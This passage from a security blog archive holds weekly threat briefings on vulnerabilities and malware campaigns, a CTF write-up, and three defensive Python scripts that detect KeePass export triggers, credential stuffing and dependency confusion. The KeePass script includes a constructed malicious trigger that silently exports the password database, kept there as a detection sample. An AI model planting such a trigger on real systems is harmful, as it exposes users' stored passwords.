Google has released a new version of Chrome 110 which fixes a total of 15 vulnerabilities, 10 of which were reported by security researchers outside the company. The breakdown by criticality is as follows: 3 high, 5 medium and 2 low. The three highest-severity ones are: CVE-2023-0696, which a remote attacker could exploit through a specially crafted HTML page; CVE-2023-0697, affecting Chrome for Android, which could allow a remote attacker to use a manipulated HTML page to spoof the contents of the security user interface; and CVE-2023-0698, which would allow a remote attacker to perform an out-of-bounds memory read via a malicious HTML page. It is recommended to update to Chrome versions 110.0.5481.77/.78 for Windows and 110.0.5481.77 for Mac and Linux to fix these vulnerabilities.

More info ⇾
February 10, 2023
Cyber Security
How I won a Capture the Flag competition by solving challenges using my mobile phone
We organised activities aimed at the technical audience in the Hacking Village area as part of our participation in the Barcelona Security Congress 2023 event. One of the activities was a Capture the Flag challenge in which 74 hackers registered, including both on-site and online participants. David Soto, our guest blogger, was the first participant to solve three challenges, winning the competition and the prize. In this post he tells us how he managed to do it using only his mobile phone, and what the keys are to staying ahead in the field of cybersecurity.

* * *

BY DAVID SOTO, CYBER SECURITY SPECIALIST

I am David Soto and I am lucky enough to work as an IT consultant as a cybersecurity and secure development specialist at ERNI Consulting Spain. I have been passionate about this field since I was a child. In Capture the Flag (CTF) competitions I am known by the alias of JDarkness and I have the honour of having won competitions such as IntelCon, MundoHacker or PwnVerse, among others. And more recently, just a few days ago, the one organised by Telefónica Tech together with campus 42 during the celebration of the Barcelona Cybersecurity Congress.

Capture the Flag competitions are free competitive games that test your knowledge and skills as a hacker. Participants find themselves in different types of challenges with the objective of getting a "flag", a code that proves that you have solved the challenge. On this occasion, since I won the challenge in a somewhat "different" way, using only my mobile phone, I have been invited to write this post telling how the competition went and my experience. So here is my story:

A couple of weeks ago, while looking at the schedule of the Barcelona Cybersecurity Congress, I found out that this year they had prepared a hybrid Capture the Flag challenge, with online and on-site modalities. As I was planning to go to the congress, I signed up with the intention of seeing what challenges they had prepared, sitting down for a while with my laptop and seeing how far I could go.

Humbert in the Hacking Village space at Barcelona Cybersecurity Congress

Once I received the admission tickets, I started to prepare my itinerary: tour with the DCA, visits to the exhibitors of interest... I set aside 30 minutes to sit in the Hacking Village and look at the challenges without much intention of winning. When the DCA tour was over, I headed to the Hacking Village to log on to my laptop and take on the challenges. However, just at that moment, a presentation had started and there was not a single free seat left. As I needed to connect my laptop, I thought: "Well, I'll take my chances; as I just want to see what the challenges are about, I'll look at them on my phone". So I went to visit the stands. I have to say that on my phone I carry a Termux with a small Kali Linux distribution, which, although uncomfortable, allows me to carry out small tests and tasks in case I need to do so.

How the Capture the Flag challenge went, step by step

In this CTF, co-organised by Fundación Telefónica with the 42 programming campus, participants were challenged with three cybersecurity challenges plus an extra one to test their skills in memory analysis, use of cookies, password cracking... To win, they had to solve at least three of the four challenges: warm-up, steganography, forensics and web.

1. Warm-up challenge

The warm-up challenge was to find a text string within the main page and pass it as a flag. Easy, so I moved on to the next one.

2. Steganography challenge

This type of challenge is based on hiding information inside files or images that do not appear to hide anything. Participants must discover where the information is hidden and extract it. After the warm-up, the steganography challenge was the first "real" challenge. It consisted of a login screen with a nice Telefónica Tech logo...

3. Forensic challenge

A forensic challenge involves analysing files and systems in order to recover information (such as encrypted or deleted data) and identify intruders, attackers or the perpetrators of computer crimes. In this case it was a couple of supposedly dumped memory files or disk images... Having neither a keyboard nor the right applications, I didn't even consider solving the challenge at the time, but I could always come back later if needed.

Martina Matarí, Head of Offensive Security Services at Telefónica Tech, during her speech.

4. Web challenge

Given the above, I decided to go for the last one, the web challenge. These usually include the identification and exploitation of vulnerabilities in websites, the recovery of sensitive information or the analysis of network packets. Perhaps the most accessible without tools. The web challenge also started with a login screen asking for a username and password. I applied a SQL injection that worked its magic and returned a list of users and encrypted passwords. The challenge statement mentioned a control panel. I found it, but it had SQLi protection, so I couldn't do a SQL injection. But as I had the previous credentials, I could log in without any problem. And with that, the exercise was completed.

The keys: knowledge, methodologies and tools

At this point three challenges already had a solution, so I went to have lunch with my colleagues and forgot about the competition. To my surprise, I received an email inviting me to collect the prize for the highest score in person! I went to collect the prize, and the story of how I had won using my phone made a big impact.

The fact that I solved these challenges on the phone is thanks to having clear methodologies. In this sense, I had the pleasure of learning from the great Francisco Martín, who always insisted on two things:

- Fat-button tools are only used when you know what they do and you are able to manage without them.
- Fuzzing is your friend: fuzz everything.

Jokes aside, I think understanding what we do, how we do it and why we do it is essential for those of us in IT. So I would like to take this opportunity to encourage future professionals to learn, to investigate and not to remain on the surface of what we are taught. Because, who knows, maybe that will allow you to achieve things that nobody expects you to achieve.
February 9, 2023
Cyber Security
Cyber Security Weekly Briefing, 21 January – 3 February
LockBit Green: new LockBit variant
Researchers at vx-underground have detected a new ransomware variant, called LockBit Green, in use by the LockBit operators. It would be the group's third variant, after the original LockBit Red and its successor LockBit Black (also known as LockBit 3.0). Several researchers who analysed the available samples found that LockBit Green is based on Conti's leaked source code. The ransom note is the one used by LockBit 3.0, and encrypted files no longer receive the .lockbit extension but a random one. The PRODAFT team has shared Indicators of Compromise (IoCs) and a YARA rule for the new variant. More info →

* * *

GitHub revokes compromised Desktop and Atom certificates
GitHub has revoked a number of code-signing certificates used for its Desktop and Atom applications after they were exfiltrated in a security incident in December. According to the company, the unauthorised access did not affect the platform's services, but a set of certificates was taken as a result. The certificates are password-protected and, so far, no malicious use of them has been detected. Revoking them invalidates GitHub Desktop for Mac versions 3.0.2 to 3.1.2 and Atom versions 1.63.0 and 1.63.1. Desktop users are advised to upgrade to the latest version, and Atom users to revert to an earlier version. The revocation takes effect on 2 February. More info →

* * *

PoC available for KeePass vulnerability
A proof of concept (PoC) has been released for a recently reported KeePass weakness, tracked as CVE-2023-24055. An attacker with write access to the system can modify the XML configuration file and add an export trigger: the next time the user opens KeePass and enters the master password, the trigger fires in the background and exports the database, with usernames and passwords in clear text, to a file the attacker can read. KeePass had already described this behaviour in 2019 without considering it a vulnerability, since it requires write access to the host; users are now asking for a confirmation prompt before any export, or for a way to disable the feature. Bleeping Computer recommends ensuring that unprivileged users cannot write to any application files and deploying an enforced configuration file (KeePass.config.enforced.xml), whose settings take precedence over the user's own configuration. More info →

* * *

Two new vulnerabilities in Cisco devices
Researchers at Trellix have reported two vulnerabilities in Cisco devices. The first, CVE-2023-20076 with a vendor CVSS of 7.2, allows an authenticated, remote attacker to inject commands into various devices. The second, so far tracked only as Cisco bug ID CSCwc67015, would allow remote code execution and the overwriting of existing files. Both were initially found in Cisco ISR 4431 routers but also affect the 800 Series Industrial ISRs, CGR1000 Compute Modules, IC3000 Industrial Compute Gateways, IOS XE-based devices configured with IOx, IR510 WPAN industrial routers and Cisco Catalyst access points (COS-APs). Cisco has released security updates for the first vulnerability, and the researchers urge affected organisations to upgrade to the latest available firmware and to disable the IOx framework if it is not needed. More info →

* * *

Lazarus campaign against energy and healthcare companies
WithSecure has published extensive research on the latest campaign by the Lazarus APT, allegedly backed by North Korea, which it has named "No Pineapple!". In it the group stole around 100 GB of data from medical research, engineering and energy companies, among others. According to WithSecure, Lazarus exploited CVE-2022-27925 and CVE-2022-37042 in Zimbra to place a webshell on the victims' mail server, and once inside used tools such as the Dtrack backdoor and a new version of the GREASE malware, which abuses the PrintNightmare vulnerability. Beyond the TTPs already associated with the group, WithSecure attributed the campaign to Lazarus after finding that the webshells communicated with an IP address located in North Korea. More info →

Featured photo: Brecht Corbeel / Unsplash
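The KeePass item above is a case where the attacker never touches the database: the configuration file does the work. The script below is an added example, not KeePass's code and not the published PoC. It parses the TriggerSystem section of a KeePass.config.xml and flags any trigger action that names an export format together with a destination path, which is exactly what a CVE-2023-24055-style trigger needs. The sample configuration is constructed, the GUIDs in it are placeholders rather than real KeePass event or action identifiers, and the export format strings are assumed to be the ones KeePass shows in its export dialog ("KeePass XML (2.x)", "KeePass CSV (1.x)"). On a hardened host the expected answer is no triggers at all, or exactly the set defined in the enforced configuration file.

```python
"""Scan a KeePass.config.xml for trigger-based database exports (added example)."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

# Assumption: export actions carry the format name from the export dialog
# as a parameter, followed by the destination file path.
EXPORT_FORMAT_RE = re.compile(r"KeePass (XML|CSV)", re.IGNORECASE)
# Windows drive path, UNC path or POSIX absolute path.
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|\\\\|/)\S+")

# Constructed sample: one trigger that silently exports the database and one
# harmless trigger. GUID values are placeholders, not real KeePass identifiers.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="utf-8"?>
<Configuration>
  <Application>
    <TriggerSystem>
      <Enabled>true</Enabled>
      <Triggers>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-1</Guid>
          <Name>exfil</Name>
          <Enabled>true</Enabled>
          <Events>
            <Event>
              <TypeGuid>PLACEHOLDER-EVENT</TypeGuid>
              <Parameters><Parameter>0</Parameter><Parameter /></Parameters>
            </Event>
          </Events>
          <Conditions />
          <Actions>
            <Action>
              <TypeGuid>PLACEHOLDER-ACTION</TypeGuid>
              <Parameters>
                <Parameter>KeePass XML (2.x)</Parameter>
                <Parameter>C:\Users\Public\export.xml</Parameter>
                <Parameter />
                <Parameter />
              </Parameters>
            </Action>
          </Actions>
        </Trigger>
        <Trigger>
          <Guid>PLACEHOLDER-TRIGGER-2</Guid>
          <Name>benign</Name>
          <Enabled>true</Enabled>
          <Events><Event><TypeGuid>PLACEHOLDER-EVENT</TypeGuid><Parameters /></Event></Events>
          <Conditions />
          <Actions>
            <Action>
              <TypeGuid>PLACEHOLDER-ACTION-2</TypeGuid>
              <Parameters><Parameter>Hello</Parameter></Parameters>
            </Action>
          </Actions>
        </Trigger>
      </Triggers>
    </TriggerSystem>
  </Application>
</Configuration>
"""


def _trigger_elements(config_xml: str):
    root = ET.fromstring(config_xml)
    return root.iterfind("./Application/TriggerSystem/Triggers/Trigger")


def list_trigger_names(config_xml: str) -> List[str]:
    """Every trigger name, to diff against the enforced configuration."""
    return [t.findtext("Name", default="") for t in _trigger_elements(config_xml)]


def find_export_triggers(config_xml: str) -> List[Dict[str, object]]:
    """Flag actions whose parameters name an export format and a destination path."""
    findings = []
    for trig in _trigger_elements(config_xml):
        name = trig.findtext("Name", default="")
        enabled = trig.findtext("Enabled", default="true").strip().lower() == "true"
        for action in trig.iterfind("./Actions/Action"):
            params = [(p.text or "").strip() for p in action.iterfind("./Parameters/Parameter")]
            fmt = next((p for p in params if EXPORT_FORMAT_RE.search(p)), None)
            path = next((p for p in params if PATH_RE.match(p)), None)
            if fmt and path:
                findings.append({"trigger": name, "enabled": enabled, "format": fmt, "path": path})
    return findings


if __name__ == "__main__":
    print("triggers:", list_trigger_names(SAMPLE_CONFIG))
    for f in find_export_triggers(SAMPLE_CONFIG):
        print(f"[!] trigger {f['trigger']!r} exports {f['format']} to {f['path']} (enabled={f['enabled']})")
```

Run it against the real file (%APPDATA%\KeePass\KeePass.config.xml, or the KeePass directory for a portable install) and compare the trigger list with what your enforced configuration defines; any trigger the enforced file does not define is something a local attacker could have planted.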
February 3, 2023
Cyber Security
Cyber Security Weekly Briefing, 21 – 27 January
Killnet targeting victims in Spain
This week the hacktivist group Killnet announced a campaign against Germany, with Distributed Denial of Service (DDoS) attacks that on Wednesday rendered the websites of the German government, the Bundestag, several banks and airports inoperative. The group then posted a comment on its Telegram channel pointing directly at Spain as a possible next target: "Spain – f*** you too, but with you everything will be easier and faster". Other participants in the channel went on to single out two Spanish companies as supposedly "easy" to attack. No attacks against Spanish critical infrastructure operators or government agencies have been reported so far.

* * *

Apple fixes 0-day vulnerability affecting older iPhones and iPads
Apple has issued a security advisory with patches for an actively exploited 0-day in older iPhones and iPads. The vulnerability, CVE-2022-42856 with a CVSSv3 of 8.8, is a type confusion in the WebKit browser engine: processing maliciously crafted web content may lead to arbitrary code execution. It was patched in December for other Apple products and the fix is now available for older devices, specifically the iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3 and iPod touch (6th generation). Apple's advisory states that the flaw may have been actively exploited against versions of iOS released before iOS 15.1. CISA added it to its Known Exploited Vulnerabilities catalogue on 14 December. More info →

* * *

VMware vulnerabilities fixed
VMware has released security patches for several vulnerabilities in vRealize Log Insight, now known as VMware Aria Operations for Logs. The first, CVE-2022-31703 (CVSS 7.5), is a directory traversal flaw that lets attackers inject files into the affected system and achieve remote code execution. CVE-2022-31704 (CVSS 9.8) is a broken access control vulnerability that can likewise be exploited for remote code execution. The company has also fixed a deserialisation vulnerability, CVE-2022-31710 (CVSS 7.5), which can trigger a denial of service, and an information disclosure flaw, CVE-2022-31711 (CVSS 5.3). More info →

* * *

PY#RATION: a new Python-based RAT
The Securonix research team has discovered a new Python-based malware campaign with Remote Access Trojan (RAT) capabilities. The malware, named PY#RATION, is under active development and has moved from version 1.0 to 1.6.0 since it was first detected in August 2022. It is distributed via phishing e-mails with .ZIP attachments containing two .lnk shortcut files disguised as images (front.jpg.lnk and back.jpg.lnk). When the shortcuts are opened, the victim is shown the front and back of a British driving licence while the malicious code contacts the C2, which downloads two additional files to the user's temporary directory. Once running, PY#RATION can perform network enumeration and file transfers, log keystrokes, steal clipboard data, extract passwords and cookies from web browsers and execute shell commands, among other capabilities. According to Securonix, the campaign mainly targets victims in the UK and North America. More info →

* * *

Microsoft plans to block XLL files from the Internet
After disabling macros in Office files downloaded from the Internet to curb the spread of malware, Microsoft's next step is to block XLL files coming from the Internet, mainly as e-mail attachments. XLL files are Excel add-in libraries that provide additional features to Excel (dialogue boxes, toolbars, etc.). Since they are native executable code, threat actors include them in phishing campaigns to download malware onto the victim's computer with a single click. According to Microsoft, the measure is being rolled out and will be generally available in March. More info →

Featured photo: Arnel Hasanovic / Unsplash
January 27, 2023
Cyber Security
Cyber Security Weekly Briefing, 14 – 20 January
Critical vulnerabilities in Netcomm and TP-Link routers
Several vulnerabilities have been discovered in Netcomm and TP-Link routers. The Netcomm flaws, CVE-2022-4873 and CVE-2022-4874, are a buffer overflow and an authentication bypass which together allow remote code execution. The researcher who discovered them, Brendan Scarvell, has published a PoC for both. The affected models are the Netcomm NF20MESH, NF20 and NL1902 running firmware versions prior to R6B035. Separately, CERT/CC detailed two vulnerabilities in the TP-Link WR710N-V1-151022 and Archer-C5-V2-160201 routers that could lead to information disclosure (CVE-2022-4499) and remote code execution (CVE-2022-4498). More info →

* * *

PoC for multiple vulnerabilities in WordPress plugins
Researchers at Tenable have published details of three new vulnerabilities in WordPress plugins, with proof-of-concept (PoC) code for all of them. The first, CVE-2023-23488 with a CVSS score of 9.8, is an unauthenticated SQL injection in the Paid Memberships Pro plugin. The second, CVE-2023-23489, with the same score and of the same type, affects the Easy Digital Downloads plugin. The third, CVE-2023-23490 with a CVSS score of 8.8, is also a SQL injection and affects the Survey Maker plugin. The plugin authors were notified in December 2022 and have released security updates, so the latest available versions are no longer vulnerable. More info →

* * *

Hook: new banking trojan targeting Android devices
Researchers at ThreatFabric have discovered a new Android banking trojan called Hook, released by the same developer as the Ermac banking trojan but with more capabilities than its predecessor. ThreatFabric notes that Hook shares much of its source code with Ermac and should therefore also be considered a banking trojan. Its most notable feature is a VNC (virtual network computing) module that lets the operators take control of the compromised device's interface in real time. According to the ThreatFabric report, Spain is the country with the second highest number of banking applications targeted by Hook, after the United States. More info →

* * *

Malware discovered hidden in PyPI repository packages
Fortinet researchers have discovered three packages in the PyPI (Python Package Index) repository containing malicious code intended to infect developers' systems with infostealer malware. The three packages, uploaded by the same user under the nickname Lolip0p, are called Colorslib, httpslib and libhttps. Fortinet highlights that, unlike most supply chain attacks of this type, the threat actor did not embed malware in malicious copies of legitimate packages but created its own projects, investing considerable effort in making them look trustworthy. The setup file of all three packages is identical and attempts to run a PowerShell command that downloads a malicious file. According to PyPI's statistics, the three packages had been downloaded 549 times in total. More info →

* * *

NortonLifeLock reports password manager incident
Gen Digital, the company that owns NortonLifeLock, has begun notifying an undisclosed number of users that an unauthorised third party accessed their Norton Password Manager accounts and exfiltrated first names, last names, phone numbers and e-mail addresses. In the official notification filed with the Vermont Attorney General's Office, Norton explains that its systems were not compromised and that the incident was a credential stuffing attack: the attacker reused usernames and passwords from a database for sale on the dark web. This is supported by the fact that in late December Norton detected a substantial and unusual increase in failed login attempts, indicating that attackers were trying passwords compromised on other services against Norton accounts. The incident again highlights the need for a proper password policy with unique passwords for each online service. More info →

Featured photo: Souvik Banerjee / Unsplash
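The signal Norton describes, a spike in failed logins followed by a handful of successes against accounts whose passwords were reused, is easy to turn into a detection. The script below is an added example, not Norton's or Gen Digital's logic: it slides a time window over failed logins per source IP, alerts when one source fails against many distinct accounts, and lists the successful logins from that source as probable compromised accounts. The log format and the sample lines are constructed for the example (RFC 5737 test addresses); adapt the regex to your own authentication log.

```python
"""Credential-stuffing detection over authentication logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed log format: "<ISO timestamp> ip=<addr> user=<name> result=OK|FAIL"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}Z) ip=(?P<ip>\S+) "
    r"user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _build_sample_log() -> List[str]:
    """Constructed sample: one stuffing source, one clumsy legitimate user."""
    base = datetime(2022, 12, 28, 3, 0, 0)
    lines = []
    # Attacker: 30 different accounts in under five minutes, all failing...
    for i in range(30):
        ts = base + timedelta(seconds=10 * i)
        lines.append(f"{ts.strftime(TS_FMT)} ip=203.0.113.10 user=user{i:02d}@example.com result=FAIL")
    # ...except two whose password was reused from another breach.
    for minute, user in ((6, "user05@example.com"), (7, "user09@example.com")):
        ts = base + timedelta(minutes=minute)
        lines.append(f"{ts.strftime(TS_FMT)} ip=203.0.113.10 user={user} result=OK")
    # Legitimate user mistypes twice, then succeeds: must not alert.
    for i, result in enumerate(("FAIL", "FAIL", "OK")):
        ts = base + timedelta(minutes=1, seconds=20 * i)
        lines.append(f"{ts.strftime(TS_FMT)} ip=198.51.100.7 user=alice@example.com result={result}")
    return lines


SAMPLE_LOG = _build_sample_log()


def parse_line(line: str) -> Optional[dict]:
    m = LOG_RE.match(line)
    if not m:
        return None
    event = m.groupdict()
    event["ts"] = datetime.strptime(event["ts"], TS_FMT)
    return event


def detect_credential_stuffing(lines, window=timedelta(minutes=10),
                               min_failures=20, min_users=10) -> Dict[str, dict]:
    """Per source IP, slide a time window over failed logins and alert when a
    window holds >= min_failures failures against >= min_users accounts.
    Returns {ip: {failures, distinct_users, first, last, successes}}."""
    events = sorted((e for e in map(parse_line, lines) if e), key=lambda e: e["ts"])
    fails: Dict[str, List[dict]] = defaultdict(list)
    oks: Dict[str, List[str]] = defaultdict(list)
    for e in events:
        if e["result"] == "FAIL":
            fails[e["ip"]].append(e)
        else:
            oks[e["ip"]].append(e["user"])

    alerts: Dict[str, dict] = {}
    for ip, evs in fails.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            if len(win) >= min_failures and len(users) >= min_users:
                current = alerts.get(ip)
                if current is None or len(win) > current["failures"]:
                    alerts[ip] = {
                        "failures": len(win),
                        "distinct_users": len(users),
                        "first": win[0]["ts"],
                        "last": win[-1]["ts"],
                        # Successes from a stuffing source = accounts whose reused password worked.
                        "successes": oks.get(ip, []),
                    }
    return alerts


if __name__ == "__main__":
    for ip, a in detect_credential_stuffing(SAMPLE_LOG).items():
        print(f"[!] {ip}: {a['failures']} failures against {a['distinct_users']} accounts "
              f"between {a['first']} and {a['last']}; successes: {a['successes']}")
```

The thresholds are deliberately conservative so a user fumbling a password never trips them; in practice you would tune them to the service's normal failure rate, and the "successes" list is the set of accounts to force a password reset on, which is what a notification like Norton's amounts to.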
January 20, 2023
Cyber Security
Cyber Security Weekly Briefing, 7 – 13 January
Microsoft fixes 98 vulnerabilities on Patch Tuesday
Microsoft has published its January security bulletin, fixing a total of 98 vulnerabilities. Among them stands out an actively exploited 0-day, CVE-2023-21674 with a CVSSv3 of 8.8, a privilege escalation vulnerability in Windows Advanced Local Procedure Call (ALPC) that could give an attacker SYSTEM privileges. Also noteworthy is CVE-2023-21549 (CVSSv3 8.8), a publicly disclosed privilege escalation in the Windows SMB Witness service whose exploitation could allow the execution of RPC functions restricted to privileged accounts. Eleven of the 98 vulnerabilities are rated critical by Microsoft, among them CVE-2023-21743, CVE-2023-21561, CVE-2023-21730, CVE-2023-21556, CVE-2023-21555, CVE-2023-21543, CVE-2023-21546, CVE-2023-21679, CVE-2023-21548 and CVE-2023-21535. More info →

* * *

Critical vulnerability in unsupported Cisco routers
Cisco has issued a security advisory warning of a critical vulnerability affecting several end-of-life Cisco routers. A public PoC exists, although no exploitation attempts are known at present. The flaw, CVE-2023-20025 with a vendor CVSSv3 of 9.0, is an authentication bypass caused by incorrect validation of user input in incoming HTTP packets: an unauthenticated remote attacker could exploit it by sending a specially crafted HTTP request to the management interface of a vulnerable device. It can be chained with a second new vulnerability, CVE-2023-20026, to achieve arbitrary code execution. The affected devices are the Cisco Small Business RV016, RV042, RV042G and RV082 routers. Cisco will not release a patch; as mitigation it recommends disabling remote management and blocking access to ports 443 and 60443. More info →

* * *

IcedID takes less than 24 hours to compromise Active Directory
Researchers at Cybereason have published an analysis of the IcedID banking trojan, also known as BokBot, highlighting how quickly it can compromise a victim's environment. According to the report, IcedID starts lateral movement less than an hour after the initial infection, compromises Active Directory in under 24 hours and begins data exfiltration within 48 hours. The report also notes that IcedID has changed its initial access vector: originally distributed via Office files with malicious macros, after Microsoft's macro blocking measures it now arrives via ISO and LNK files. Finally, IcedID shares tactics, techniques and procedures (TTPs) with groups such as Conti and LockBit. More info →

* * *

Vulnerability actively exploited in Control Web Panel (CWP)
The Shadowserver Foundation and GreyNoise have detected active exploitation of the critical vulnerability in Control Web Panel (CWP) tracked as CVE-2022-44877, with a CVSSv3 of 9.8. Discovered by researcher Numan Türle and patched in October, it was only last week that further details and a proof of concept (PoC) were published. The vulnerability allows an unauthenticated attacker to perform remote code execution or escalate privileges on vulnerable servers, and the first exploitation attempts were observed on 6 January. It affects CWP7 versions prior to 0.9.8.1147. GreyNoise has observed four unique IP addresses attempting to exploit it. More info →

* * *

Latest SpyNote version targets banking customers
Researchers at ThreatFabric have reported recent activity in the SpyNote malware family, also known as SpyMax. The latest known variant, SpyNote.C, was sold by its developer via Telegram under the name CypherRat between August 2021 and October 2022, accumulating around 80 customers according to the researchers. In October 2022, however, the source code was shared on GitHub, which led to a sharp increase in the number of detected samples. Among the latest samples, SpyNote.C has been seen targeting banking applications, impersonating apps from banks such as HSBC, Deutsche Bank, Kotak Bank or BurlaNubank, as well as other well-known applications such as Facebook, Google Play or WhatsApp. SpyNote.C combines spyware and banking trojan capabilities: it can use the device's camera API to record and send video to its C2, obtain GPS and network location information, steal social network credentials and exfiltrate banking credentials, among other capabilities. More info →
January 13, 2023
Cyber Security
Cyber Security Weekly Briefing, 31 December – 6 January
PyTorch's dependency chain is breached
PyTorch, a popular open-source machine learning framework, has warned users who installed PyTorch-nightly between 25 and 30 December 2022 to uninstall the framework and the 'torchtriton' library, following a successful dependency confusion attack. A malicious 'torchtriton' package uploaded to PyPI shared its name with a library published in the PyTorch-nightly package index; because the PyPI entry took precedence during resolution, it was installed on users' systems instead of the legitimate one and stole sensitive information from the victim's machine. PyTorch has renamed the library to 'pytorch-triton' and reserved a placeholder 'torchtriton' package on PyPI to prevent similar attacks. Users of stable PyTorch releases are not affected. More info →

* * *

Synology fixes a critical vulnerability
Synology has addressed a maximum severity vulnerability in VPN Plus Server. The vulnerability, CVE-2022-43931 with a CVSS of 10.0, can be exploited in low-complexity attacks without privileges or user interaction, allowing a remote attacker to execute arbitrary commands. The company has released fixes and recommends users upgrade VPN Plus Server for SRM to the latest version. More info →

* * *

New Raspberry Robin campaign
Security Joes researchers have detected new attacks by the Raspberry Robin framework against insurance and financial institutions in Europe. Raspberry Robin activity was also recently documented by the Trend Micro team, but Security Joes has observed a new, more complex version of the malware. The download mechanism has been updated with new anti-analysis capabilities, and the attackers now collect more data from victims' machines: where the C2 beacon previously contained a URL with the username and hostname in plain text, it now also includes the processor name and details of the video devices available on the machine, and this victim profile is encrypted with RC4. This time the victims are Portuguese- and Spanish-speaking organisations. More info →

* * *

MasquerAds: malware distribution campaign using Google Ads
Researchers at Guardio have warned of a malware distribution campaign via Google Ads which they have named MasquerAds. The ads, supposedly promoting popular legitimate programs such as Zoom, Slack, AnyDesk, Blender, Audacity or Brave, point to a benign website approved by Google's ad system; once the link is clicked, however, the user is redirected to a different site from which the malware, hosted on legitimate services such as GitHub, Dropbox or Discord, is eventually downloaded. Guardio attributes the campaign to the group known as Vermux and indicates that it has mostly affected users in the United States and Canada. Malware variants observed include cryptocurrency miners and the Raccoon and Vidar stealers. The use of Google Ads in such campaigns appears to have increased recently, prompting the FBI to issue an alert. More info →

* * *

Zoho fixes critical vulnerability in ManageEngine
Zoho has addressed a security flaw affecting several ManageEngine products. The flaw, CVE-2022-47523, is a SQL injection vulnerability affecting Password Manager Pro, the PAM360 privileged access management software and the Access Manager Plus privileged session management solution. Successful exploitation gives an attacker unauthenticated access to the back-end database, allowing arbitrary queries. Zoho recommends upgrading the affected products to the latest version as soon as possible. More info →
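The PyTorch item above turns on one rule of pip's resolver: when a private index is combined with PyPI through --extra-index-url, every index is consulted and the highest version wins, whichever index was listed first. The following is an added example, not PyTorch's or pip's code. It models that selection rule, shows the two mitigations PyTorch applied (reserving the public name and, in effect, removing the collision) alongside the two a consumer can apply (pinning, or resolving from the private index only), and audits a requirements list for the conditions that make the attack possible. The index contents and versions are constructed; only plain dotted numeric versions are parsed (no PEP 440 pre-releases or local labels), and the tie-break between equal versions is an assumption of this model, not pip's documented behaviour.

```python
"""Why dependency confusion works, and how to close it (added example)."""
from typing import Dict, List, Optional, Tuple

Index = Dict[str, List[str]]  # package name -> versions available on that index


def parse_version(v: str) -> Tuple[int, ...]:
    """Simplified: dotted numeric versions only."""
    return tuple(int(part) for part in v.split("."))


def resolve(name: str, indexes: List[Tuple[str, Index]],
            pin: Optional[str] = None) -> Optional[Tuple[str, str]]:
    """Return (version, index_name) that would be installed, or None.
    All indexes are consulted and the highest version wins, which is pip's
    behaviour with --extra-index-url. A pin restricts candidates to that exact
    version. On equal versions this model prefers the index listed first
    (assumption, not pip's documented tie-break)."""
    candidates = []
    for position, (index_name, packages) in enumerate(indexes):
        for version in packages.get(name, []):
            if pin is None or version == pin:
                candidates.append((parse_version(version), -position, version, index_name))
    if not candidates:
        return None
    _, _, version, index_name = max(candidates)
    return version, index_name


def collisions(private: Index, public: Index) -> List[str]:
    """Private package names that also exist on the public index: each is a
    dependency-confusion candidate unless the public entry is your own
    placeholder (which is what PyTorch registered for 'torchtriton')."""
    return sorted(set(private) & set(public))


def audit_requirements(text: str, private: Index, public: Index) -> List[str]:
    """Warn about requirement lines that are unpinned or collide with PyPI."""
    warnings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, version = line.partition("==")
        if not version:
            warnings.append(f"{name}: not pinned; highest version on any index will be used")
        if name in private and name in public:
            warnings.append(f"{name}: exists on both the private index and PyPI")
    return warnings


# Constructed scenario: the private index ships 2.0.0; an attacker uploads a
# higher 3.0.0 to PyPI under the same name. Real torchtriton versions are not reproduced.
PRIVATE: Index = {"torchtriton": ["2.0.0"], "torch": ["2.0.0"]}
PYPI: Index = {"torchtriton": ["3.0.0"], "numpy": ["1.24.0"]}
INDEXES = [("private", PRIVATE), ("pypi", PYPI)]

if __name__ == "__main__":
    print("index-url + extra-index-url:", resolve("torchtriton", INDEXES))  # attacker's 3.0.0 wins
    print("pinned to 2.0.0            :", resolve("torchtriton", INDEXES, pin="2.0.0"))
    print("private index only         :", resolve("torchtriton", INDEXES[:1]))
    print("name collisions            :", collisions(PRIVATE, PYPI))
    print(audit_requirements("torchtriton\ntorch==2.0.0  # pinned\n", PRIVATE, PYPI))
```

In pip terms, the "private index only" case is `pip install --index-url https://private.example/simple ...` with no `--extra-index-url`, and the pinned case is stronger still when combined with `--require-hashes`, since a same-version package from the wrong index then fails the hash check.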
January 9, 2023
Cyber Security
Cyber Security Weekly Briefing, 24 – 30 December
LastPass confirms theft of customer vault data
LastPass has announced that its cloud storage was breached using information stolen in the incident last August, in which attackers gained access to the company's technical information and source code. Using the keys obtained from that data, the attackers were able to copy customer account information and data stored in the vault, including passwords and notes. While the vault data is encrypted, the company has warned its customers that attackers could attempt to brute-force their master passwords and gain access to all stored information. More info →

* * *

BlueNoroff incorporates new techniques to bypass Windows MotW measures
Researchers have identified new methods for bypassing Windows' Mark of the Web (MotW) protection that have been adopted by the group known as BlueNoroff. This actor, associated with the Lazarus group and known for previous cryptocurrency theft attacks, has incorporated techniques to evade the warning Windows displays when a user opens a file downloaded from the Internet, by delivering its payloads inside .ISO and .VHD container files. While the investigation originated from a company in the United Arab Emirates affected by the group, the naming of the domains and documents used in the attack chain points to a specific interest in Japanese companies, particularly in the financial sector. More info →

* * *

400 million Twitter users' data for sale
A threat actor named Ryushi recently put a database allegedly containing 400 million Twitter user records up for sale on a popular underground forum. As proof, the seller provided a sample of 1,000 accounts including private information of prominent users such as Donald Trump Jr. and Brian Krebs. The seller claims the data was extracted through a vulnerability and includes e-mail addresses and phone numbers of celebrities, politicians, businesses and ordinary users. He also invites Twitter and Elon Musk to buy the data to avoid GDPR lawsuits, alluding to the investigation opened by the Irish Data Protection Commission into an earlier breach of more than 5.4 million Twitter users' data, obtained by exploiting an API vulnerability that Twitter fixed in January 2022. More info →

* * *

EarSpy: new eavesdropping attack
